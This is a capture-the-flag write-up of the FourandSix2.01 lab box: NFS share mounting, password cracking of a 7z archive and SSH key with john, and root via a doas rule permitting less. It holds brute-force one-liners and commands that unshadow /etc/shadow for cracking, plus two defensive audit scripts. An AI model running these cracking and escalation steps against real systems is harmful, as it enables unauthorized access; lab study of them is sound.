FourandSix2.01 Box

Information gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.111
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-06 21:52 EDT
Warning: 192.168.56.111 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.56.111
Host is up (0.00044s latency).
Not shown: 61719 filtered tcp ports (no-response), 3813 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
2049/tcp open nfs
MAC Address: 08:00:27:41:81:5A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 71.15 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,111,2049 192.168.56.111
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-06 21:53 EDT
Nmap scan report for 192.168.56.111
Host is up (0.00030s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (protocol 2.0)
111/tcp open rpcbind 2 (RPC #100000)
2049/tcp open nfs 2-3 (RPC #100003)
MAC Address: 08:00:27:41:81:5A (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: OpenBSD 6.X
OS CPE: cpe:/o:openbsd:openbsd:6
OS details: OpenBSD 6.0 - 6.4
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.25 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,111,2049 192.168.56.111
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-06 22:00 EDT
Nmap scan report for 192.168.56.111
Host is up (0.00029s latency).

PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
2049/tcp open nfs
MAC Address: 08:00:27:41:81:5A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 24.50 seconds

Mounting the NFS share

┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.56.111
Export list for 192.168.56.111:
/home/user/storage (everyone)

┌──(kali㉿kali)-[~]
└─$ mkdir /tmp/infosec

┌──(kali㉿kali)-[~]
└─$ mount -t nfs 192.168.56.111:/home/user/storage /tmp/infosec
mount.nfs: failed to apply fstab options

An odd failure; after looking it up, the mount probably needs root privileges.

┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 192.168.56.111:/home/user/storage /tmp/infosec

┌──(kali㉿kali)-[~]
└─$ cd /tmp/infosec

┌──(kali㉿kali)-[/tmp/infosec]
└─$ ls
backup.7z

┌──(kali㉿kali)-[/tmp/infosec]
└─$ cp backup.7z /home/kali/Downloads/FourAndSix

Cracking the 7z archive

The share contains only a single backup.7z file. Copy it to a local path, then use the file command to check the file type and 7za l to list what the archive contains.

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ ls
backup.7z

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ file backup.7z
backup.7z: 7-zip archive data, version 0.4

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ where 7za
/usr/bin/7za
/bin/7za

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ 7za l backup.7z

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs AMD Ryzen 7 5800H with Radeon Graphics (A50F00),ASM,AES-NI)

Scanning the drive for archives:
1 file, 62111 bytes (61 KiB)

Listing archive: backup.7z

--
Path = backup.7z
Type = 7z
Physical Size = 62111
Headers Size = 303
Method = LZMA2:16 7zAES
Solid = +
Blocks = 1

Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2018-10-28 04:45:33 ....A 9000 61808 hello1.jpeg
2018-10-28 04:45:33 ....A 5247 hello2.png
2018-10-28 04:45:33 ....A 8903 hello3.jpeg
2018-10-28 04:45:33 ....A 8330 hello4.png
2018-10-28 04:45:33 ....A 10038 hello5.jpeg
2018-10-28 04:45:33 ....A 5931 hello6.png
2018-10-28 04:45:33 ....A 6181 hello7.jpeg
2018-10-28 04:45:33 ....A 8182 hello8.jpeg
2018-10-28 05:50:57 ....A 1856 id_rsa
2018-10-28 05:52:57 ....A 398 id_rsa.pub
------------------- ----- ------------ ------------ ------------------------
2018-10-28 05:52:57 64066 61808 10 files

It contains some images and an SSH public/private key pair.

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ 7za x backup.7z

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs AMD Ryzen 7 5800H with Radeon Graphics (A50F00),ASM,AES-NI)

Scanning the drive for archives:
1 file, 62111 bytes (61 KiB)

Extracting archive: backup.7z
--
Path = backup.7z
Type = 7z
Physical Size = 62111
Headers Size = 303
Method = LZMA2:16 7zAES
Solid = +
Blocks = 1


Enter password (will not be echoed):

Tried to extract it, but a password is required, and just pressing Enter errors out, so let's brute-force it with a tool. I originally wanted to use rarcrack, but it was far too slow; after googling, I decided to use hashcat together with

┌──(kali㉿kali)-[~]
└─$ hashcat -m 11600 7z.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.5) starting

OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-AMD Ryzen 7 5800H with Radeon Graphics, 708/1480 MB (256 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

clBuildProgram(): CL_BUILD_PROGRAM_FAILURE

error: unknown target CPU 'generic'
Device pthread-AMD Ryzen 7 5800H with Radeon Graphics failed to build the program, log: error: unknown target CPU 'generic'

* Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.

Started: Tue Jun 6 22:22:43 2023
Stopped: Tue Jun 6 22:22:44 2023

hashcat errored out... Searching around, this problem is rather troublesome to solve; it appears to be a VMware issue. I tried several methods without success, so let's download hashcat on the host machine and try there instead.

hashcat.exe -m 11600 7z.hash rockyou.txt

Brute-forcing did produce a result... but there is a stranger problem: the cracked password seems to be wrong and cannot extract the 7z file. Let's switch to another tool, john.

┌──(kali㉿kali)-[~]
└─$ john --format=7z -w /usr/share/wordlists/rockyou.txt 7z.hash
Warning: invalid UTF-8 seen reading /usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip archive encryption [SHA256 128/128 AVX 4x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 0 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Cost 4 (data length) is 9488 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with wordlist:/usr/share/john/password.lst
Press 'q' or Ctrl-C to abort, almost any other key for status
chocolate (?)
1g 0:00:00:05 DONE (2023-06-06 22:40) 0.1953g/s 65.62p/s 65.62c/s 65.62C/s benjamin..cruise
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Successfully obtained the password chocolate; extraction succeeded.

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ ls
backup.7z hello2.png hello4.png hello6.png hello8.jpeg id_rsa.pub
hello1.jpeg hello3.jpeg hello5.jpeg hello7.jpeg id_rsa
┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ file *.jpeg
hello1.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 258x195, components 3
hello3.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 227x222, components 3
hello5.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 226x223, components 3
hello7.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 282x179, components 3
hello8.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 204x248, components 3

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ file *.png
hello2.png: PNG image data, 257 x 196, 8-bit colormap, non-interlaced
hello4.png: PNG image data, 206 x 244, 8-bit colormap, non-interlaced
hello6.png: PNG image data, 177 x 232, 8-bit colormap, non-interlaced

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDClNemaX//nOugJPAWyQ1aDMgfAS8zrJh++hNeMGCo+TIm9UxVUNwc6vhZ8apKZHOX0Ht+MlHLYdkbwSinmCRmOkm2JbMYA5GNBG3fTNWOAbhd7dl2GPG7NUD+zhaDFyRk5gTqmuFumECDAgCxzeE8r9jBwfX73cETemexWKnGqLey0T56VypNrjvueFPmmrWCJyPcXtoLNQDbbdaWwJPhF0gKGrrWTEZo0NnU1lMAnKkiooDxLFhxOIOxRIXWtDtc61cpnnJHtKeO+9wL2q7JeUQB00KLs9/iRwV6b+kslvHaaQ4TR8IaufuJqmICuE4+v7HdsQHslmIbPKX6HANn user@fourandsix2

Cracking the private key passphrase

We should first examine the images with file, xdg-open, binwalk (for bundled/appended files) and exiftool (for comment metadata).

The image files seem fine, so the focus goes to the key pair; let's try logging in with the private key.

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ ssh -i id_rsa user@192.168.56.111
The authenticity of host '192.168.56.111 (192.168.56.111)' can't be established.
ED25519 key fingerprint is SHA256:bYL1jAzqEuvAJUa0fNrhsGN1637L223ZIavvbfsCL0g.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.111' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':

The private key is encrypted, so it's time for another round of brute-forcing.

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ ssh2john id_rsa >rsa_hash

It doesn't seem easy to specify john's format parameter directly, so let john detect it itself. Another small problem came up: the session ended immediately.

Using default input encoding: UTF-8
Loaded 402687 password hashes with no different salts (tripcode [DES 128/128 AVX])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Proceeding with wordlist:/usr/share/john/password.lst
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2023-06-06 22:52) 0g/s 354200p/s 354200c/s 142631MC/s 123456..sss
Session completed.

Not sure what caused it, but running the john command with sudo cracked it successfully.

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt rsa_hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
12345678 (id_rsa)
1g 0:00:00:00 DONE (2023-06-06 22:55) 1.111g/s 35.55p/s 35.55c/s 35.55C/s 123456..butterfly
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
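The john output above shows why the passphrase fell within a second of wordlist time: the key is in openssh-key-v1 format with bcrypt at only 16 rounds. As an added example (not code from the original writeup), this Python inspector reads the cipher, KDF and round count from a key's cleartext header, so a defender can inventory keys stored without a passphrase or with few KDF rounds; MIN_ROUNDS is an assumed policy threshold and build_sample constructs test fixtures rather than real keys.

```python
import base64
import struct

PEM_BEGIN = "-----BEGIN OPENSSH PRIVATE KEY-----"
PEM_END = "-----END OPENSSH PRIVATE KEY-----"
MAGIC = b"openssh-key-v1\x00"
MIN_ROUNDS = 64   # assumed local policy; ssh-keygen's default (-a) is 16, as on this box


def _read_string(buf, off):
    """Read one SSH wire-format string (uint32 length + bytes) starting at off."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def inspect_openssh_key(pem_text):
    """Return (cipher, kdf, rounds) from an openssh-key-v1 private key.
    Only the cleartext header is parsed, so no passphrase is needed;
    rounds is 0 when the key is stored without a passphrase."""
    body = "".join(l for l in pem_text.splitlines() if l not in (PEM_BEGIN, PEM_END))
    raw = base64.b64decode(body)
    if not raw.startswith(MAGIC):
        raise ValueError("not an openssh-key-v1 blob (legacy PEM keys are not handled)")
    off = len(MAGIC)
    cipher, off = _read_string(raw, off)
    kdf, off = _read_string(raw, off)
    kdfopts, off = _read_string(raw, off)
    rounds = 0
    if kdf == b"bcrypt":                      # kdfoptions = string salt, uint32 rounds
        _salt, o = _read_string(kdfopts, 0)
        (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
    return cipher.decode(), kdf.decode(), rounds


def assess(pem_text, min_rounds=MIN_ROUNDS):
    """Classify a key as 'unencrypted', 'weak' (few bcrypt rounds) or 'ok'."""
    _cipher, kdf, rounds = inspect_openssh_key(pem_text)
    if kdf == "none":
        return "unencrypted"
    return "weak" if rounds < min_rounds else "ok"


def _string(b):
    return struct.pack(">I", len(b)) + b


def build_sample(cipher, kdf, rounds):
    """Constructed fixture: a header with the given cipher/KDF and empty key
    sections. Not a usable key, just enough for the inspector to parse."""
    kdfopts = b""
    if kdf == b"bcrypt":
        kdfopts = _string(b"\x00" * 16) + struct.pack(">I", rounds)
    blob = (MAGIC + _string(cipher) + _string(kdf) + _string(kdfopts)
            + struct.pack(">I", 1) + _string(b"") + _string(b""))
    b64 = base64.b64encode(blob).decode()
    lines = [b64[i:i + 70] for i in range(0, len(b64), 70)]
    return "\n".join([PEM_BEGIN, *lines, PEM_END]) + "\n"
```

Run it over real id_rsa files with `assess(open(path).read())`; a key that ssh-keygen wrote with `-a 100` or more reports as ok under the assumed threshold.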

SSH login

With the passphrase in hand, try the SSH private-key login again.

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ ssh -i id_rsa user@192.168.56.111
Enter passphrase for key 'id_rsa':
Last login: Mon Oct 29 13:53:51 2018 from 192.168.1.114
OpenBSD 6.4 (GENERIC) #349: Thu Oct 11 13:25:13 MDT 2018

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

fourandsix2$ whoami
user
fourandsix2$ id
uid=1000(user) gid=1000(user) groups=1000(user), 0(wheel)

Privilege escalation

Next comes privilege escalation. Start with post-shell information gathering: enumerate the files in the current directory.

fourandsix2$ ls
storage
fourandsix2$ pwd
/home/user
fourandsix2$ ls -liah
total 40
129920 drwxr-xr-x 4 user user 512B Oct 29 2018 .
2 drwxr-xr-x 3 root wheel 512B Oct 29 2018 ..
129923 -rw-r--r-- 1 user user 87B Oct 11 2018 .Xdefaults
129924 -rw-r--r-- 1 user user 771B Oct 11 2018 .cshrc
129925 -rw-r--r-- 1 user user 101B Oct 11 2018 .cvsrc
129926 -rw-r--r-- 1 user user 359B Oct 11 2018 .login
129927 -rw-r--r-- 1 user user 175B Oct 11 2018 .mailrc
129928 -rw-r--r-- 1 user user 215B Oct 11 2018 .profile
129921 drwx------ 2 user user 512B Oct 29 2018 .ssh
129929 drwxr-xr-x 2 user user 512B Oct 29 2018 storage
fourandsix2$ cd storage/
fourandsix2$ ls -liah
total 132
129929 drwxr-xr-x 2 user user 512B Oct 29 2018 .
129920 drwxr-xr-x 4 user user 512B Oct 29 2018 ..
129930 -rw-r--r-- 1 user user 60.7K Oct 29 2018 backup.7z

The passwd file

fourandsix2$ cat /etc/passwd
root:*:0:0:Charlie &:/root:/bin/ksh
daemon:*:1:1:The devil himself:/root:/sbin/nologin
operator:*:2:5:System &:/operator:/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
build:*:21:21:base and xenocara build:/var/empty:/bin/ksh
sshd:*:27:27:sshd privsep:/var/empty:/sbin/nologin
_portmap:*:28:28:portmap:/var/empty:/sbin/nologin
_identd:*:29:29:identd:/var/empty:/sbin/nologin
_rstatd:*:30:30:rpc.rstatd:/var/empty:/sbin/nologin
_rusersd:*:32:32:rpc.rusersd:/var/empty:/sbin/nologin
_fingerd:*:33:33:fingerd:/var/empty:/sbin/nologin
_x11:*:35:35:X Server:/var/empty:/sbin/nologin
_switchd:*:49:49:Switch Daemon:/var/empty:/sbin/nologin
_traceroute:*:50:50:traceroute privdrop user:/var/empty:/sbin/nologin
_ping:*:51:51:ping privdrop user:/var/empty:/sbin/nologin
_rebound:*:52:52:Rebound DNS Daemon:/var/empty:/sbin/nologin
_unbound:*:53:53:Unbound Daemon:/var/unbound:/sbin/nologin
_dpb:*:54:54:dpb privsep:/var/empty:/sbin/nologin
_pbuild:*:55:55:dpb build user:/nonexistent:/sbin/nologin
_pfetch:*:56:56:dpb fetch user:/nonexistent:/sbin/nologin
_pkgfetch:*:57:57:pkg fetch user:/nonexistent:/sbin/nologin
_pkguntar:*:58:58:pkg untar user:/nonexistent:/sbin/nologin
_spamd:*:62:62:Spam Daemon:/var/empty:/sbin/nologin
www:*:67:67:HTTP Server:/var/www:/sbin/nologin
_isakmpd:*:68:68:isakmpd privsep:/var/empty:/sbin/nologin
_syslogd:*:73:73:Syslog Daemon:/var/empty:/sbin/nologin
_pflogd:*:74:74:pflogd privsep:/var/empty:/sbin/nologin
_bgpd:*:75:75:BGP Daemon:/var/empty:/sbin/nologin
_tcpdump:*:76:76:tcpdump privsep:/var/empty:/sbin/nologin
_dhcp:*:77:77:DHCP programs:/var/empty:/sbin/nologin
_mopd:*:78:78:MOP Daemon:/var/empty:/sbin/nologin
_tftpd:*:79:79:TFTP Daemon:/var/empty:/sbin/nologin
_rbootd:*:80:80:rbootd Daemon:/var/empty:/sbin/nologin
_ppp:*:82:82:PPP utilities:/var/empty:/sbin/nologin
_ntp:*:83:83:NTP Daemon:/var/empty:/sbin/nologin
_ftp:*:84:84:FTP Daemon:/var/empty:/sbin/nologin
_ospfd:*:85:85:OSPF Daemon:/var/empty:/sbin/nologin
_hostapd:*:86:86:HostAP Daemon:/var/empty:/sbin/nologin
_dvmrpd:*:87:87:DVMRP Daemon:/var/empty:/sbin/nologin
_ripd:*:88:88:RIP Daemon:/var/empty:/sbin/nologin
_relayd:*:89:89:Relay Daemon:/var/empty:/sbin/nologin
_ospf6d:*:90:90:OSPF6 Daemon:/var/empty:/sbin/nologin
_snmpd:*:91:91:SNMP Daemon:/var/empty:/sbin/nologin
_ypldap:*:93:93:YP to LDAP Daemon:/var/empty:/sbin/nologin
_rad:*:94:94:IPv6 Router Advertisement Daemon:/var/empty:/sbin/nologin
_smtpd:*:95:95:SMTP Daemon:/var/empty:/sbin/nologin
_rwalld:*:96:96:rpc.rwalld:/var/empty:/sbin/nologin
_nsd:*:97:97:NSD Daemon:/var/empty:/sbin/nologin
_ldpd:*:98:98:LDP Daemon:/var/empty:/sbin/nologin
_sndio:*:99:99:sndio privsep:/var/empty:/sbin/nologin
_ldapd:*:100:100:LDAP Daemon:/var/empty:/sbin/nologin
_iked:*:101:101:IKEv2 Daemon:/var/empty:/sbin/nologin
_iscsid:*:102:102:iSCSI Daemon:/var/empty:/sbin/nologin
_smtpq:*:103:103:SMTP Daemon:/var/empty:/sbin/nologin
_file:*:104:104:file privsep:/var/empty:/sbin/nologin
_radiusd:*:105:105:RADIUS Daemon:/var/empty:/sbin/nologin
_eigrpd:*:106:106:EIGRP Daemon:/var/empty:/sbin/nologin
_vmd:*:107:107:VM Daemon:/var/empty:/sbin/nologin
_tftp_proxy:*:108:108:tftp proxy daemon:/nonexistent:/sbin/nologin
_ftp_proxy:*:109:109:ftp proxy daemon:/nonexistent:/sbin/nologin
_sndiop:*:110:110:sndio privileged user:/var/empty:/sbin/nologin
_syspatch:*:112:112:syspatch unprivileged user:/var/empty:/sbin/nologin
_slaacd:*:115:115:SLAAC Daemon:/var/empty:/sbin/nologin
nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin
user:*:1000:1000:user:/home/user:/bin/ksh

No cron jobs?

fourandsix2$ cat /etc/crontab
cat: /etc/crontab: No such file or directory
fourandsix2$ ls
acme firmware ldap mtree random.seed skel
acme-client.conf fstab localtime myname rc soii.key
amd ftpusers locate.rc netstart rc.conf spwd.db
authpf gettytab login.conf newsyslog.conf rc.conf.local ssh
changelist group magic npppd rc.d ssl
daily hostname.em0 mail ntpd.conf resolv.conf syslog.conf
disktab hosts mail.rc passwd resolv.conf.tail termcap
doas.conf hotplug mailer.conf pf.conf rmt ttys
dumpdates iked master.passwd pf.os rpc usermgmt.conf
examples installurl moduli ppp services weekly
exports isakmpd monthly protocols shells
fbtab ksh.kshrc motd pwd.db signify

Privilege escalation via doas

The /etc directory indeed has no cron job files or directories, but there is one notable file, doas.conf; I ran into this escalation technique just yesterday.

fourandsix2$ cat doas.conf
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root

Hmm, not exactly identical, but close enough.
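As an added example (not code from the original writeup), here is a small audit script that parses doas.conf rules like the two above and flags permits that hand a non-root identity root, either outright or through a program that GTFOBins lists as able to spawn a subshell, which is exactly what the /usr/bin/less rule on this box does. SHELL_CAPABLE is an assumed list and SAMPLE_CONF is a constructed copy of the box's two rules.

```python
import os
import shlex

# Programs GTFOBins lists as able to spawn a subshell (assumed list; the box's less is one).
SHELL_CAPABLE = {"less", "more", "vi", "vim", "ed", "man"}
OPTIONS = ("nopass", "nolog", "persist", "keepenv", "setenv")

# Constructed sample: the two rules from the box, plus a comment line.
SAMPLE_CONF = """# /etc/doas.conf as found on fourandsix2
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root
"""

def parse_doas_rule(line):
    """Parse one doas.conf(5) rule into a dict; return None for blank/comment lines."""
    line = line.split("#", 1)[0].strip()
    if not line:
        return None
    tok = shlex.split(line)
    if tok[0] not in ("permit", "deny"):
        raise ValueError("rule must start with permit/deny: " + line)
    rule = {"action": tok[0], "options": set(), "identity": None,
            "target": None, "cmd": None, "args": None}
    i = 1
    while i < len(tok) and tok[i] in OPTIONS:
        rule["options"].add(tok[i])
        i += 1
        if tok[i - 1] == "setenv":          # skip the { VAR=value ... } block
            i = tok.index("}", i) + 1
    rule["identity"] = tok[i]               # user name or :group
    i += 1
    if i < len(tok) and tok[i] == "as":
        rule["target"], i = tok[i + 1], i + 2
    if i < len(tok) and tok[i] == "cmd":
        rule["cmd"], i = tok[i + 1], i + 2
    if i < len(tok) and tok[i] == "args":
        rule["args"] = tok[i + 1:]          # [] means "no arguments allowed"
    return rule

def audit_doas_conf(text):
    """Return permit rules giving a non-root identity root, outright or via a shell-capable program."""
    findings = []
    for line in text.splitlines():
        rule = parse_doas_rule(line)
        if rule is None or rule["action"] != "permit":
            continue
        target = rule["target"] or "root"   # doas.conf(5): the target user defaults to root
        if target != "root" or rule["identity"] == "root":
            continue
        if rule["cmd"] is None:
            reason = "any command as root"
        elif os.path.basename(rule["cmd"]) in SHELL_CAPABLE:
            reason = "shell-capable program %s as root" % rule["cmd"]
        else:
            continue
        if "nopass" in rule["options"]:
            reason += ", without a password"
        findings.append({"identity": rule["identity"], "cmd": rule["cmd"], "reason": reason})
    return findings
```

On the box's file the audit reports the first rule only: the second grants root to root, which is not an escalation.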

Spawning a new shell from less

There is a technique for spawning a new shell from here (v opens the vi editor); we follow GTFOBins to start a new shell.

fourandsix2$ doas -u root /usr/bin/less /var/log/authlog

fourandsix2# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
fourandsix2# cd /root
fourandsix2# ls
.Xdefaults .cshrc .cvsrc .forward .login .profile .ssh flag.txt
fourandsix2# cat flag.txt
Nice you hacked all the passwords!

Not all tools worked well. But with some command magic...:
cat /usr/share/wordlists/rockyou.txt|while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo $line; break;fi;done

cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done


Here is the flag:
acd043bc3103ed3dd02eee99d5b0ff42
fourandsix2#

Success!

Notes

The mount command

1. The mount point directory must exist beforehand; create it with mkdir.
2. The mount point directory must not be in use by any other process.
3. Files already present under the mount point are hidden while the share is mounted.

// list the server's exports
showmount -e IP

// mount locally
mkdir /tmp/infosec
sudo mount -t nfs IP:/path /tmp/infosec

// unmount (umount takes the mount point as its argument)
sudo umount /tmp/infosec

-t specifies the filesystem type; it is usually unnecessary, since mount picks the correct type automatically. Common types are:
CD-ROM or ISO image: iso9660;
DOS FAT16 filesystem: msdos;
Windows 9x FAT32 filesystem: vfat;
Windows NT NTFS filesystem: ntfs;
Windows network file share: smbfs;
UNIX (Linux) network file share: nfs

The john cracking tool

Cracking Linux password hashes

The files JtR cracks must be in a specific format. To convert the passwd and shadow files, we use the /usr/sbin/unshadow executable, which requires superuser privileges to run.

sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > ~/passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt ~/passwords.txt

Tools for converting files into JtR-compatible formats

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ locate *2john
/usr/sbin/bitlocker2john
/usr/sbin/dmg2john
/usr/sbin/gpg2john
/usr/sbin/hccap2john
/usr/sbin/keepass2john
/usr/sbin/putty2john
/usr/sbin/racf2john
/usr/sbin/rar2john
/usr/sbin/uaf2john
/usr/sbin/vncpcap2john
/usr/sbin/wpapcap2john
/usr/sbin/zip2john

SSH key passphrase cracking

To test JtR's SSH key passphrase cracking, first create a fresh key pair. Note: JtR does not crack the key file itself (the bit size of the generated key does not matter); it only cracks the passphrase that encrypts the private key.

# Create a private key (ssh-keygen prompts for a passphrase)
ssh-keygen -t rsa -b 4096
# Convert the encrypted private key into john's hash format
/usr/sbin/ssh2john ~/.ssh/id_rsa > id_rsa.hash

Next, all you need to do is point John the Ripper at that file with your wordlist:

/usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash

The story of the doas command

Explanation from Wikipedia

doas ("do as") is a program for executing commands as another user. The system administrator can configure it to grant specified users permission to run specific commands. It is free and open-source software under the ISC license, usable on UNIX and Unix-like operating systems. doas was developed by Ted Unangst for OpenBSD as a simpler and more secure replacement for sudo.
All permissions are defined in the configuration file /etc/doas.conf.


FourandSix2.01 Box
https://i3eg1nner.github.io/2023/06/7015100879bb.html
Author: I3eg1nner
Published: June 7, 2023
License